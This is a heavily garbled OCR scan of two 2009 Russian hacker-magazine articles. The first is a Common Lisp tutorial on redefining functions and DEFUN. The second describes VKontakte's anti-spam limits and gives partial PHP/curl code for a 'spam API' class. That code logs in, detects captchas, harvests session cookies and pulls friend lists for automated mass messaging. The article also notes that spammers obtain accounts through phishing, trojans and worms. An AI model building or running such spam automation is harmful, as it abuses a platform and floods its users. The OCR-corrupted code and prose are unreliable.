[funcaLl (carfuns)) [funcall [cadr funs! ffuncall [carfuns]]

LINKFlY

HYТPr!lL'NKFLY.RU

/

--+++

/

~

1Ii;~;4;Jii=;;;

"

ТАИНЫ

БЕССМЕРТИЯ LISP (а) (отто" Lisp: музейный экспонат или мощное средство

+++

создания ИНlтеллектуального софта?

Сегодня мы попробуем взорвать твой мозгторжественным раскрыти­ ем тайны бессмертия языка

-.+++

«Lisp». Ты узнаешь, что за штуку придумал

Джон Маккарти [тогдашний «Эйнштейн» мира программирования] В1958 году, почему эта «штука» не планирует подвергатьсязабвению и кто такие странные существа -

«Лисперы».

+++ ИЗСЕТИ

+++

+++

+ ++

+++

именно так: программа может быть сгенери­

АI-приложений Разумеется, для разработки

рована во время выполнения

даютте, кому приходилось с ними [адептами)

аеб-приложениЙ.приложениЙ,взаимо­

можешь переопределить уже определенные

функции, то есть, язык позволяет писать

-

головная больлюдей в

l

Кроме того, ты

контактировать. Вот, например, высказывание

действующих с базами данных, и прочего

одного из модераторов форума известного

общественно-полезногостаффа он также

самоизменяемые программы без исполь­

ресурса

используется.

зования ассемблера. Все эти манипуляции

Illlp:lirsdn.ru:

«Функциональные

языки в целом и Лисп в частности собрали

Одно из многих положительных качеств Лиспа

можно производить и В «докомпиляционной"

вокругсебя много откровенноневыдержанной

-

стадии, что очень способствует построению

и фанатичной публики». Чтож. приобщимся к

Два основных правила таковы:

их знаниям.

1.Твоя программа,а конкретно

его максимально аскетичный синтаксис.

оптимизированных программ. Для более

-

вызов функ­

основательного ознакш~ления С фичами

ции, должна быть заключена в скобки:

языка весьма рекомендую зайти на один из

Например: Iтвоя_программа параметр'l

лучших ресурсов по основам Лиспа:

параметр2 .. параметрNJ.

pcl.catap.ru,

ТЕОРИЯ. СКАЖИ «НЕТ» СИНТАКСИIЧЕСКОМУ РАЗВРАТУ!

2.

Сразууточню,что под термином «Лисп» В

другой функции, и ее результат будет счи­

статье подразумеваетсядиалект«Согnrnоп

таться параметром: (твоя_программа (+ 12)

LISp» [тем не менее, очень многое с небольши­

параметр2J.

ми оговорками применимо и к диалекту Лиспа

В Лиспе реализовано множество свойств,

ПОДГОТОВКА ИНСТРУМЕНТОВ

«5cheme»J. На сегодняшний день [если не

которые создатели других языков не устают

Для начала скачаем бесплатнуюверсию про­

говорить о языках общего назначения

черпать, постепенно превращая свои языки В

стенькой Лисп-системыLispWorks, которая

- ELisp

AutoLlspNisualLispl в широком употребле­

На месте пара метра может быть вызов

Лисп. Одно из них

-

ато использование функ­

b.11QJ!.

там находится переведенная на

русский язык книга "ПрактическийСогnmоп

Lisp" Питера Сейбеля.

поджидает любого начинающего эксперимен­

нии осталисьтолько эти два диалекта.

циональных объектов В качестве параме­

татора на "vvvw.lisgWDгks.соrn/dО\ЛlПlоаds.

Итак, что же зто за эверь -

тров функции ты можешь передавать другие

Чтоты говоришь? Не желаешь пользоваться

функции, которые, кстати, возможно опреде­

«простенькой системой»? Желаешь иметь

Lisp?

Это язык

общего назначения, особенно удобный

+++

лить во время выполнения программы. Да,

белых халатах?" Подобный вопрос порой за­

и

+++

для символьных вычислений, а значит, для

разработки экспертных систем и других

«Адепты Лиспа

~

098,

ХАКЕР

06/126/09

i

I

I

в своем распоряжении набор «кнопочек, пимпочек» и всякой подобной ерунды для

построения GUI? Легкоl По адресу

hllidL

fгапz,соm/dоwпlоаds тебя ждет Лисп-система «Аllеgго

CL 8.1

Fгее Ехргеss Еditiоп». Сей агре­

гатпредставляет собой бесплатную редакцию платной системы; здесь содержится все не­

обходимое

-

и GUI-кОНСТруктОр, И генерация

ехе-шников.

Обе системы ставятся на

Windows, Linux,

MacOS, FreeBSD [оцени масштабы). Повоз­ ившись с бесплатными версиями, тебе нужно будет решить: отдаватьли свои кровные за

полноценные редакции? Например, на мо­ мент написания статьи самая дешевая версия

LispWorks [для коммерческогоиспользо­ вания) стоила $1500. Но не стоит впадать в панику [а лишь ощути серьезность и мощь от­ раслиl- существуют и полностью бесплатные альтернативы,

причем, весьма качественные.

Если ты заядлый «виндузятник»,

-

«LISP - КРАЙНЕ ИНТЕРЕСНАЯ ШТУКА. ТРЕБУЕТ, КОНЕЧНО, ПОЛНОГО ПЕРЕОСМЫСЛЕНИЯ ЖИЗНЕННОГО ПУТИ И ПОГРУЖЕНИЯ

Епtег и смотри результат вычисления В ответе интерn ретатора.

ПРАКТИКА. ПЕРЕОПРЕДЕЛЯЕМ ОДИН ИЗ МЕХАНИЗМОВ ЛИСПА Итак, чтобы лучше понять суть, создадим необходимый контекст для дальнейшего изложения. Допустим, нам нужно создать

какую-либо рекурсивную функцию. В качестве примера у нас выступитфункция вычисления факториала:

(деЕип

х)

1

(* х

ДАО, НО ВСЕ-ТАКИ

тебе нужно

factoria1(x)

(if (zerop

В ИЗНАЧАЛЬНОЕ ИНТЕРЕСНАЯ».

» coding

(factoria1 (1-

скобок, среда програнмированияЭТо

сделает за нас

сколько основательно разработчики подошли

в себя Лисп-систему SBCL, под названи­

к вопросу переносимости. Вот, например,

> 120

ем "CUSP", по адресу: httg:l/bitfaLJna.com/

список архитектур, на которые они ориентиру­

projects/CLJ5p. Кстати о SBCL. Скачать ее мож­

ются; Х86, АМD64, РРС,

Eclipse, включающий

>

SPARC, Alptla, MIPSbe,

:)

Еас

to.C ia1

(factoria1 5) ;

раздобыть nлагин для

х)))))

не СТОИТ заниматься подсчетом

про верка

А теперь представимсебе, что необходимо

но с httр:l/www.sЬсl.огg/рlаtfогm-tаЫе.html.

М IPSle. А что насчет операционных систем?

эту функциональность!Функциональный

Сходить по этой ссылке я советую в любом

Списоктакже внушает почтение:

объект) связать с другим символом. В смысле,

случае, хотя бы для того, чтобы посмотреть, на­

Dагwiп!Мас OS Х], Sоlапs, FгееВSD, NetBSD,

не конкретно именно зту функциональность,

LinLJx,

OpenBSD, Windows. Впечатляет, не правда

а вообще, какую-либофункциональность,

ли? Ноучти, что под неистребимый Windows

определеннуюранее и связанную с каким­

ДЕСЯТЬ РЕЦЕПТОВ ЭЛИI<СИРА

портированиееще не завершено [причем,

либо символом, Зачем? ЭТО во многом зависит

только под архитектурух861. Главное, чего

от нашей фантазии, Сможем найти смысл в

МОЛОДОСТИ ЛИСПА

Итак, SBCL - это Лисп-система [не среда

можем осуществить это следующим образом:

ВЕЧНОЙ

L

Единообразный и простой синтаксис

пока нет в Wlпdоws-версии, -

многопоточно­

возможности переназначатьфункциональный

сти. Все остальное должно работать на «ура»,

объект, эначит, будем использовать;если нет,

хотя я, помнится, так и не смог побороть глюк

- ну значит не судьба,

библиотеки

ASDF-INSTALL,

предназначен­

И все-таки, чем бы нам это могло помочь?

ной для загрузки и компиляции библиотек из

Допустим, у нас есть чужой код, в который нет

общего хранилища Лисп-исходников [смотри

времени/желания влезать, но скорректиро­

http://cliki netJ,

вать его работу нужно, просто позареэ. Мы

разработкиl, и для экспериментов с Соmmоп

1, Ввести в систему новый символ kкажем, 'ВI

Lisp' ом ее может быть вполне достаточно.

и сохранить в нем фун кциональный объект,

Для серьезных разработокя тебе рекомендую

связанный с неким символом kкажем, 'А) и

добыть модуль к редактору Emacs

поведение которого требуется скорректиро­

- SLIME,

(облегчает генерацию кода макросами),

Самая что ни на есть крутая и бесплатная

вать.

2.... Макросы

комбинация

2. Определить новую функцию, которая осу­

вреivlени компиляции на

-

это

«EMACS - SLIME - SBCL»

самом Лиспе,

SLIME можно взять отсюда: httр:l/соmmоп­

ществляет какие-либо нужные нам действия,

;i, Определениеи переопределениефунк­

lisр.пеt/огоjесt/slimе. Если ты хочешь все и

дополняющиедействия функционального

ций во время выполнения,

сразу, то можешьскачать один из вариантов

объекта [связанного с А а теперь еще и с

~ Компиляцияи выполнениекода, сгене­

LispBox здесь: httр:l/соmmоп-lisр.пеt/ргоjесt/

'В], а также действия этого функционального

рированногов run-time,

lispbox или здесь: http:Ugigamol1keys.com/

объекта (этого самого - связанного с 'А и .8).

5.., Определение

book/lispbox.

языков с синтаксисом под

При определении этой функции для вызова функции изначальной нужно пользоваться

задачу,

!i.. Огромное

количество

open-source

библиотек (http://cliki,net).

Z. Более гибкая

и динамичная, по срав­

ПРАКТИКА. ОСНОВНЫЕ ФУНКЦИИ ЛИСПА

3.Связатьфункционалы~ыЙ объект, пред­

После установки и запуска выбранной

ставляющий новую функцию, с символом А

СИ м волом' В. Почему -

будет понятно далее.

нению с другими языками, объектная

Лисп-системы ты увидишь перед собой

Поэтому, собственно, для вызова «родной»

система

консоль интерпретатора. Например, в случае

функции И нужно было польэоваться новым

~. Возможность модифицировать соб­

LispWorks строка приглашения консоли будет

символом 'В,

ственное ядро, даже во время выполнения,

выглядеть так:

с функцией, включающей дополнительные

(CLOS),

2.. Поддержка

действия.

практически всех суще­

ствующих наданный момент парадигм

- символ'А теперь будет свюан

На примере:

CL-USER 1 >

программирования,

10, Декларативноеописаниециклических

Да, именно сюда тебе и следует вводить вы­

алгоритмов(с помощьюформы LOOP),

ражения языкаЛисп. Все хозяйство напоми­ нает

ХАКЕР

06 /126/ 09

UNIX Shell:

вводи выражения, нажимай

;Определяем функцию ОТ двух аргу­ ментов

(defun re1ation-is (obj1 obj2)

I

i

I

,

I

++

::-::- c:oding

+++ ."'~...

~.

-

..

,'k.'.-..

_

I~·""

,.,....., '0"0'"

,..;.

18:1~! ~~ i-:~С:~:::r~.;--~~-~·~~~~~~~~5fЗ_~~_!:_~_~_ - ~ ~.-~~~~-: ~~~=~~! ~+++

1~ ~ !!:rJ:~~::1::;::~~:;~-~~::::3:~ ! *MIS1 "1Щii.Оli

..-I

:.

...

:~

~

II

..---;,~~:'

I=.c..

I

l!yltt- .~; ­

--I·f----·-­ ~j} I~r '!!. ~!!!!III!!~!j~~ ]:..с .. МIЫ\I1r~LET. НF~jI;tt-,.

!~: ~

~::""oe ... !_

~;::

:,'

r=~-=J

1~'

~=-.

(0IИ_

HIL)

(rIHO-УlItDDV :lpE~C"lL'HIJ*'OIl).)

• 1""'

(Ш «~=i~\I'lI>olt ~fDJl:tI1

:,nVII

~I
j~~_:~~:1IЮ

:0""

~~~~~;::1f""IНQOII

'••Cr19t:lon IIIf .11 ~'''Pl1.r ~""tch" 1I~\I'jI; t

~~:,

~~--~ ... "-;;,;,;==--·1

.::

11'1N:"frft.oq1.113.1:.15

I C:\O'oC.,,,,,,t..

Slttt1nSl"'''Jnkl'll_'tto''

tlng.. : 1I1'lt,jII 1. 'plq 1,

"P'.~

I~II

1, 40\
I\·U","").

n.p~~

DLJ

~nll

•. ~ ,

">:'1<­

-:;

,.

~ ~ - - . . .• PNв!))

~I

.~(Рош.

ALLE6RO CL 8.1 FREE EXPRESS EDIТlON (list obj1 'is obj2» ;проверка

(re1ation-is 'cat 'anima1) >­ (cat is anima1)

; Сохраняем старую версию ФУНКЦИИ (setf (symbo1-function 'old-relation-is) (symbo1-function 'relation-is» ;Добавляеl1 Функциональности

{defun re1ation-is (obj1 obj2) ;теперь

re1ation-is

{list :relation ; проверка

нового

связан с другой функцией

(old-re1ation-is obj1 obj2»)

варианта

(re1ation-is 'cat 'anim(1) > (:RELAT10N

(САТ

1S

AN1МAL)

I

I~+++

Попробуем то же самое провернуть с рекурсивной функцv,ей, в нашем случае

- с факторv,алом:

{setf (symbo1-function 'old-factoria1) ; сохраняем старую версию (symbo1-function 'factoria1»)

+++

(defun factorial (print

(х)

х)

;;;

(list (list 'factorial

+++

(old-factoria1 (factoria1 >

5)

Ошибка!!!

ной, подобной

"1n * of (1 (( 'FACTOR1AL Ье

3.

Однако всеведущие создатели не позаботились о системной пере мен­

х) ) )

; проверка

arguments shou1d

Далее код из Листинга

х)

О)



of type NUMBER ..,

*lhis*. Это было сделано ради борьбы за ПРОИЗ90дитель­

ность и, видимо, для стимуляциизрелой самостоятельностив среде програм м нстов. Ладно, м ы все сделаем сами.

+++ Как мы видим, при манипулироsании рекурсивными функциями таким

(dеfшасго

образон возникает проблема. Это происходит из-за того, что при sыполнении изначальной функции В ее недрах происходит не sызоs

+++

jнодифицируем заныкаеиое значение

изначальной. Как же забороть эту проблему?

(setq *this* (symbo1-function • ,паше»

; возэращаем символ определенной ф-l1А

Ненного подумаем. Нам нужно успешно вызвать в функции саму себя,

причем не функцию, сsязанную С каким-либо символом [так как может

+++

гf-++

;это нужно для создания замыкания

(defun ,name ,args ,@body)

саной себя, а вызов новой функцv,и, добавляющей функциональности к

происходить пере назначение функций), а использовать функцию, ре­

defun-new (name args &body body)

(let (*this*)

• ,name»

;dеfшасго

;Проверка

ально SЫПОЛI~ЯЮЩУЮСЯ в данный момент. Сразу напрашивается вопрос

(defun-new f

- а не предоставляет ли язык нам такую возможность? Какую-нибудь

(f

системную переменную ероде 'this', содержащуютекущий, выполняе­

> (34 #
(х)

(list

х

*this*»

34)

мый функциональныйобъект. Тогда можно было бы сделатьтак: Как работает сие чудо? Разберем по косточкам:

; Новое определение Факториала

(defun factorial(x)

т++



(zerop

(DEFUN F

1

(* х

+++

~100

(шасrоехрапd

(funcal1 *this* (1-

' (defun-new f

(х)

(list

х

*this*)))

> (LET (*THIS*)

х)

х»)))

(Х)

(L1ST

Х *TНIS*)

(SETQ *TH1S*

ХАКЕР

06 1126/09

» coding

(symbol-functi.on 'factorial) (defun factori.al (pri.nt

(х)

; какое-либо

х)

действие

11ist (list 'factorial

х)

(let ({new-factorial •....' .... ·.J~I (_r."'_U" 'M'~'" "'. ,- "1' =., M~' '(Jtt\.tII""••

, . . . . ( .... <Т ... ' . . ~tl..

I

(......,.."•••_ , ...:r­ !~;;IIoI

( .....

(,

~)

'~.H

(с.Н

,...tr.

.

•• (чllll-.l·'" '{_·,.... ""Н

f.M,t.~

·..r... 1 !_. '....L.Lo. '•• 1•••

I"_\-I,,,,~tl... ·.I~#)

. .,_l-'..,сН ..

(symbol-function 'old-factorial» Н"

(progl ; можно и (factoria.l

••,...\~I.... fi ... "1)

'П ( ~

(1 (' I

• Всемирная

(setf (symbol-function 'factorial)

"аН1НI а -t~1~.))

("'/.00011.)(1'_"

(•• н

(symbol-function 'factorial»)

''''''_1)

"~" ~)1I1

'"

(old-fa.ctorial

телей Лиспа. даже начинающий адепт

х)

х)

должен знать зто:

(symbol-fuпсtiоп

(setf

'factorial)

(SYMBOL- FUNCTION (QUOTE (QUOTE

Р)

Р)

;prog1, let

портал стоннами

; list

))

)

исходн ого кода:

common-lisp.nel.

;defun

(Eactoria.l 5)

Вот в такой вот код разворачивается ма крос

1) Функция LET создает

;проверка

defun-new:

локальную связь с символом

Теперь добьемсятого, чтобы стандартный процесс опреде­

"THIS".

лени~ функций позволял нам пользоватьсяпеременной

2)Далее создается функция с помощью стандартной

'THIS" ДЛЯ этого мы напишем код, подобный определе­

формы DEFUN, в теле которой может использоваТЬС>1за­

нию

мыкаемое значение локальной переменной

DEFUN-NEW. но с некоторыми коррективами:

"THIS'.

3) Форма (SETQ *THIS' [SYMBOL-FUNCTIQN [QUOTE FJI)

;Сохраняеи текущее значение системной функции

изменяет локальное определение "THIS", а значит, и

DEFUN

(setf (macro-Eunction 'defun-old)

заМblкаемоезначениепеременной в определяемойс по­ мощью чения

DEFUN функции. Причем изменяет она его со зна­

NIL на значение,

равное функциональному объекту,

соответствующему тол ько что определенной функции.

4) [QUOTE FI- Возвращаетсимволопределеннойфунк­ ции. Теперьдостаточноопределитьfactorial с помощью

Файл слистингами к статье и весь н е­

обходимый стаффты

(rnacro-function 'defun) ; Переопределяем (defmacro defun '{let (*this*)

DEFUN,

систе.мную функцию

пользуя ее старую

версию в

(пате

args &body

Ьody)

макроса DEFUN-NEW, используя переменную *THIS* в теле

(defun-old

{setq *this* (symbol-function'

способом. Я предлагаютебе провести зтот зкспер.имент

,

,пате)

лично и увидеть все своими глазами. Откровенноговоря,

;Проверка

чтобы решить задачу «добавлениефУНКЦИОI'lальностире­

(defun

курсивным функциям», применять новый способ определе­



,пате

ис­

DEFUN-OLD

фун кции, и добавлятьфункциональностьописанным выше

,args ,@body) ,пате»)

)

Е(х)

(list

х

*this*)

5)

ния функций (через DEFUN-NEWI, учитывающий появле­

; Восстанавливаем

ние замыкаемой переменной *THI5' в теле функции, вовсе

вой

не обязательно.НО дело в том, что для пере~енной"ТН 15"

(setf (rnacro-function 'defun)

DEFUN

есть и другое примеf1ение. Например, можно заставить

прежнее значение,

если в но­

больше нет необходимости

(macr.o-function 'defun-pld))

фун кци ю ре гистрировать себя где- либо, используя для зтого фун кционал

bf1bI й

объе кт, соответствующи й вы пол­

Ощути величие ситуации l Мы дополнили системный меха­

f1яемой в настоящий момеf1ТфУНКЦИИ. Заметь, что просто

низм определениS1 f10BbIX функций своим собственным ко­

зарегистрироватьсимвол

дом! Попробуй-ка проделать то же самое, например, с Си.

имеf1И фУf1КЦИИ может быть не­

достаточно из-за возможности переназначения функцио­

Дополни iпl mу_fuпсtiопkhаг argl, char arg2] С,} нужным

нальных объектов. Я уверен, найдетсS1 Мf10жество способов

тебе функционалом. Если ты всерьез заду~ался над этим

применеНИS1'ТНI5', но вот для чего его применить не

вопросом, -

получится, так зто дл~ добавлени~ фУНКЦИОf1альности к уже

Македонским

созданным кем-то фУf1кциям

На зтом примере мы стобой осознали одну важную вещь:

1

Либо из-за отсутствия исход­

смотри незагреми в компанию к Наполеону с

;J.

ников, либо из-за необходи~ости добавлять функциональ­

Лисп - это наш слуга, а не наоборот, как бываетобычно. И

ность в

это еще одна причина Бессмертия Лиспа.

r'un-time.

Далее ~ покажу тебе, как обойтись без 'ТН 15' при до­

бавлении ФУНl:;циональности к уже готовым функциям, а

ЗАКЛЮЧIЕНИЕ

затем рассмотрю ситуацию, когда

Еслиты понял суть вышеописанного, и твой мозг не взор­

'THIS" все-таки нужен,

но создавать новый способ (макрос) определенияфункций

вался,

не хочется.

называться "Лиспером»

Вот код, который следует использоватьдля «апгрейда»уже

к сожалению, много чего осталось за рамками статьи: и

готовых рекурсивныхфункцийIбез 'THIS*).

оригинальный процесс разработки, не идущий ни в какое

-

то можешь при желании вступать

8

секту и гордо

:1.

сравнение по качеству с традиционным, и описание сбор­

; ;; ,"

добавление функциональностик уже

(defun factorial(x) (if (zerop х) 1 (,.

рассказ олидерах сообщества, ихтворчестве И бесплат­

*THIS*

ных библиотеках, и ... в общем, много чего хотелось бы еще х

(factoria1 (1-

х»)))

(setf (symbo1-function 'old-factorial) ХАКЕР

06 {1261

О.

ки автономных исполн~емых файлов lехе, еltl, и поднятие программируемого дина~ического лисп-веб-сервера, и

ГОТОВЫМ рекурсивным функциям

;определение факториала без

alu.org. ·огромныйЛисп­

new-factorial)

»

ассо­

циация пользова­

рассказать, но, ксожалению, статья не резиновая. Судя по

всему

- То Ье сопtiпuеd. :JE

найдешь на нашем пацанском диске.

[23]­ >> ,:;.()d'r\,-;\

,~~

"/~ ~ I

ДЕНИС БОНДАРЕВ

I

AST~RGANST~R"'GMAIL.COM

'"",,ЕR,,",П

I

_

­

"

'~

~.~ спдм />::/

1+++

+++

I

ф

D~_ J-~ ~ ~ CS) l§§I

[[][] ID~~~ ~CS)~

,:;,

1-++

'ТАЦЕНТР АёПАtv1@ЕА

++ . 1.

, , " - ",','

+++

+++

СВЯЗЬ КЛИЕНТА

• ПОЧТОВЫЙ

СЕРВЕР

1+++

"

1+++

+++

ТВОРЧЕСКИИ СПАМ ВКОНТАКТИКА Сага о том, как программерырассылаютсвоим друзьям

'+++

+++

поздравительныесообщения в наше просвещенноевремя нежелательнойкорреспонденцией в социальныхсетях уже никого не удивишь: В одноглазникахи кон­

1+++

тактиках имеет аккаунты большая часть активного населения нашей родины. Это же население представляетсобой вкусную пищу для рас­

1+++

сыльщиков - туттебе и ФИО, и возраст, и координаты в пространстве. Есличеcrно, мы совсем не одобряем

во всех ее проявлениях.Так что, вперед

ких десятков сообщений в сутки пользова­

+++

сам факт существования спама: нас он

-

телям, не являющимися твоими друзьями

,+++

+++

(и то, если пользователь не запрещал

раздражает совершеннотак же, как и

и антиспама, капчи и человеческого

любого другого интернетчика, и нам так

фактора, гения и злодейства, Моцарта и

общую отсыл ку ему таких сообщениЙI.

же хочется поймать всех спамеров В один

Сальери ...

2) Время между отправлением сообще­

большой котел, залить серной кислотой и медленно кипятить на среднем огне. Так,

+++

окунемся в мир противостояния спама

КАПЧА

_

ний контролируется -

система просто 1·le

даст отправить сообщение, не выдержав

стоп, я увлекся. Почему же мы решились

И ЧЕЛОВЕЧЕСКИИ ФАКТОР

определенный лимит между вызовами

на создание статьи со столь претенциоз­

«ВКонтакте» очень неплохо защищен от

скриптов отправки [трех секунд достаточ­

НЫМ названием? А как иначе? Специали­

спама. Защита эта, по сути, стандартна

Hol. Сам понимаешь, реализация много­

стов по информационнойбезопасности

для социальных сетей:

поточности с авторизацией по одному

темная сторона силы должн,а интересовать

1) Невозможно отправить более несколь­

аккаунтустановится неуместна.

~

102

XA~EP 06 1126/ 09

!-:':-:':=:-(f..

~~-t!;.-J~,""~~,",,_-l~,~~~_~~~

~~Ъf~~~':::':~-'-""'" §~f.s.\~, .._. ....._'...._."........-..-,....

-_._-,..-...,,- -­

~:g~~~~~::~-

......

.".

КОДФ'УНКЦИИ АВТОРiИ 3АIЦИ И LOGIN_COOK[) 1

§~;~~~Е~~~~~q:~:;:.§"@:~~~~~~;т;Ё;:"-::F.:--=~::.::,; _,_.

E;:,~~i~;;r.::­

ДИДЛОГБРАУЗЕРАИСЕРВЕРА ВПРОЦЕССЕАВТОРИЗАЦИИ

3)Даже если пользователи входят в

КЛIАССА

«AFOR5» олределяем гтаблик- перемен,",ую

public $auch_cook; / /

состав друзей, имеет место определен­

ный лимит в количестве отправленных сообщений. ОН довольно большой и, если все-таки

превышен,

то пользователю

предлагается пройти тест

captcha.

4) Два последовательныхличных сообще­ ния должны быть различны хотя бы на один символ, Это ограничение всерьез воспринимать не стоит.

$ch=curl_init (); / /инициализируем сеанс CtJRL / / Настраиваем сеанс CURL I! Подробнее смотрите висходниках 1/ задаем целевой скрипт curl_setopt($ch, CURLOPT_tJRL, 'http://vkontakte.ru/login.php');

5) При авторизации после пяти неверных попыток предстоит пройти тест

captcha.

Это не дает орrанизовать самостоятель­

адресованные или публичные настенные

/ / / / / /

сообщения, Мол, пользователь прочтет

/!

разрешаем отправку РОSТ-данных

их с высокой степенью вероятности, и это

// // //

составляем и отпра6ляеи запрос

ную автоматическуюпроверку аккаунтов на валидность

Самыми желанными для спам-атак в со­ циальных сетях считаются именно лично

деЙСТ8ительнотак. Комментарии, при­

глашения В группы/предложениядружбы

-

/ / / / / /

включаем получение заголовков

определяем тип браузера для МfJСКИРОВКИ

установим требование 60ззращения ответа сервера

установим реферер

за;сосим маскировочные определяем заголовки

cookies

(не все обязательны)

заносии лришедший ответ в переме!-П'1"УЮ $аП5иеr

закрываем сессию

CURL

все :но тоже активно используется

народными спамерами, но по эффектив­ ности они ниже.

Отсюда следует, что наиболее эффектив­

ным подходом будет рассылка сообщений

/ / проверяем лришедший код на наЯВrЮСТЬ

/ / текста' captcha_sid'

if (strpos ($anSWEI', 'captcha_sid') <>0)

«по друзьям», где серьезных ограничений

как таковых нет. Это значит, что спамеры, добыв пароли и логины от аккаунтов поль­

зователей (а их количество исчисляется

preg_match_all ( '#sid" : " ( . *7) "# " $answer, $sid..id) ;

/! возвращаем homep-id теста captcha

r'eturn "sid_cap:". $sid_id[l] [О];

сотнями и тысячами 11, авторизируются под каждым и организовывают

рассылку

else

сообщений по друзьям аккаунта-жертвы. Исходя иэ тосо, что таких жертв сотни или тысячи, а у каждой .~ довольно много

друзей, количество которых все время возрастает,

-

это влечет за собой просто

осромные массы сообщений и самые

/ / лроверяем при шедший код на ,..,аявность

// текста' Eailed'

if (scrpos($answer, 'failed')<>O)

returТJ "Eailed"; // возвращаем 'Eailed'

EClse

негативные последствия ОТ спама! Опять

же. возникает вопрос: каким образом

глупость, и я не уверен по поводу пер­

cookies

$this->auth_cook

ргеg_mаtсh_аll('#Sеt-сооkiе: (.*;)#tJiS',

$answeI', $answer) ;

Eor($t=O;$t
$auth_cook.=$answer[O] [$t);

preg_match ( '#remixmid= (. *7) ;#', $auttl_cook, $myid);

вой», И это 'гак :). Способы добычи аккаун­

$this->аuth_сооk=stг_rерlасе("Sеt-Сооkiе:",

спамеры добывают эти самые аккаунты и

добывают их маСС080

-

сотнями тысяч?

Не могу не вспомнить слова великого Альберта Эйнштейна' «Только две вещи

бесконечны: вселенная и человеческая

тов классические

-

// //

фишинговые сайты,

парсим и ЗаНОС~'1 в чистом виде

в переменную

" ", $auth_cook);

трояны, черви.

//

Однакохакерско-спамерскиеаспекты

~-eturn

возвра

аеи id залогиненного ПОПЕ,зователя

$myid[l];

массовых рассылок нас с тобой инте­ ресуют мало, Мы с тобой

-

социально­

активные личности, у нас много друзей. а

ХАКЕР

06 11261 09

• 103

..

»

l8]~

coding

+++

, __

iserw._IP!!t:oS!:t_~:!oJ

""

,!i,j,P 1.. ~II.php M'lPil-~ I

U~ ..r·A''NIt: IIDZ11_1oiI/~.(j ((o"!,~H~l.. :

Hast:

ICS'," r.~; wi/l"o,,~ tп ~.'; .НН tLf1I 1.1_.\~:t~;

:t;

IНП .....м

J,..,s.:. 21300""","

.,.

a"tl.. :

n"'1"".I~""".:

QfltL... t-~

..... 'th: 32-\

rl!'..1:oft.... u..-..-.\LIкI~Н.ru; ... fl\.i"ра~ ... ·~f-lI:)сс.сс_~~,) .. ,)"'6~'Ь~9.,~':

r .... j"S'ill·b21;ofQF6""~OIl"lI)Jlo\)C70C'

опlN.t-l'р";оррlio:-lot:иn/"·_·'о,. ........ гlсnсQ(!еd

~~ ~;~~~~

I

Sf'r~ .. r

I

D~r

..

';::1 ~j(h;Os8I·.\"~~2C1a 1C'02"'cl",In",R..bb'1'29t"P~!t"· 'oa'oDtos....d· ~1

19

н.у

20119

21:~.~3

С'"~

CO/l~"/lt.-'YIМ':

1f~t/" ..I. с,,",Г~Н'lIiI'l
-ЕМ:Оdih!l (1)111111.. 4

1"~1',

t,,,.. ,,105"

~~"оUl:г.. о-"'J· PIiP/5., IHI· .. tcb13

.i-'+++

Coron

~tI-Со.. kн· I'r'~~ ... -

,,,111,,1..,,,-,

r"pl""S"IO/I,



~3 с'"

,.... ,-2011 2;[ N

p~t"wJ.

GO.... Jn~ .. k"nl~Ц~ 1'11

--

BICotrtakTII!.py-",~iIМ>Носсрr;q.СТ80~аз,нако-, мы)lO'*,чТoбdlJl'n'>o".ОА~,а.vco<~сооеАНН~nп~шrА"ОСТllИl11tЬtll':ot1"t'/JI(П:. Нo''f.*.~ :r37ЗО65'J,

BJCffT&kl'e-С~ПOCOJl.~сeWтDРОCl;l
eS:17:23

• НI!Iitr"IIC.аеIi,СО:DТ~bWtеыlWl'".~-IМбo~,~5от~М101j1.Ы),'~. .)/»t4lТl>боJlloШООAl(lДIQ,,,огарооеI!.s:CJI:%I)'II:dIOТ.Н~tc:IIIЫ:It~.

• 8cw"А"'о<Ты.'I'bC'I1t1l(aorI'М;;ТО~ТOIIII,IC'ТО&.AO;JOГ,

СИ1; p~t1\'I: dOl>.>lo·.uk.... likt~.!'U

-Эtca."p&«I по СФП1'

IЗ~3~

'(n.. ""'rtpt>

~~~~~~ ~,~~~r:on~.gf'tt~u~~~~!~li~lUIIe('b~Jt'

.+++

~

С~НCt'о(
ПО C~CfI.

C~~".-col>t ....1 ~tjI.,,~,~ 1.... ,t-... L·"~ljdtt~

SH~C ..ukjf; ""N.kOk-~: '~rir~~·S'
_ •• ~

01Ul.'fТoВllcuC'l'nOXnepen1<"ТlI6J,I'IН

a'j;

ДИАЛОГ K.[IACCA С СЕРВЕРОМ «ВКОНТАКТЕ» ПРИ УСПЕШНОИ ОТПРАВКЕ НАСТЕННОГО СООБЩЕНИЯ ДРУГУ

о

~. ~ 61<ОА : реГI'<:"ТР~Ц!o'I~ ; ПОflОЩЬ

_

Добро ao:м:rr... noaaTb

rr.:w... ,,,,,.

~.J'f(Io
n!)J_",,/ •. f> ~'ln.

l8]

mKOHT~~~e_ """" ~

.1'1[1 CL~ 2.~501~~)

"~~t~kt~ .....

~~",.. ~t.;

l2:::SJ

О'51ТО

Tt)'.I"t>,'lJ:I<::I)IoXJ

6n0.'"

ГlpJDl1ro:1

po!.<:МI<';;

/lМ'ОНТllOCТгClW06-ZJ:I09

ВИД СТРАНИЦЫ АВТОРИЗАЦИИ В СОЦИАЛЬНОЙ

СЕТИ

-'+++

у друзей

- много ЛИЧНЫХ праЗДНИКОIJ. Поздравлять их вручную­

сущая пытка, позтому я предлагаю тебе написать скрипт, который будет делать зто за нас. Ниже я покажу. как написать подобный скрипт с использованием

КОД ФУНК'ЦИИ FR_REC() ИЗ КЛАССА «AFO RS» дЛ Я -'+++

--+++

ПОЛУЧЕН,ИЯ

Curl

и РНР. Назвал я его банально: «API [ог

шем

-

просто

Spam",

а 8 дальней­

«afors».

ШАГ1.

ПОДХОД И ФУНКЦИОНАЛКЛАССААFОRS.

АВТОРИЗАЦИЯ

Поскольку <,ВКонтакте» определяетавторизированногопользо­ вателя по

cookies,

нам необходимо их заполучить. Как известно,

после введения логина с паролем и отправки их на опреде­

СПИIСКАДРУЗЕЙ

ленный скрипт, сервер возвращаетВсе

cookies,

необходимые

для беспроблемногоиспользования ресурса. Поскольку нам

АВТ'ОРИЗИ,РОВАННОГО ПОЛЬЗОВАТЕЛЯ

необходимо продублироватьPOST -запрос от браузера к скрипту авторизации на сайте, мы его отснифаем. Техника ПрИМИТИ8на

- берем любой снифер [>1 рекомендую SmartSniff - http://www. nirsoft.netl и смотрим через него диалог браузера с сервером «ВКонтакте» прVt обращениVt к скрипту авторизации. Как видно из отснифанныхданных. авторизация прошла

public $fr_siz; i / public $fr_rnass; / /

определяен паблик- переменную

определяем паблик- переменную

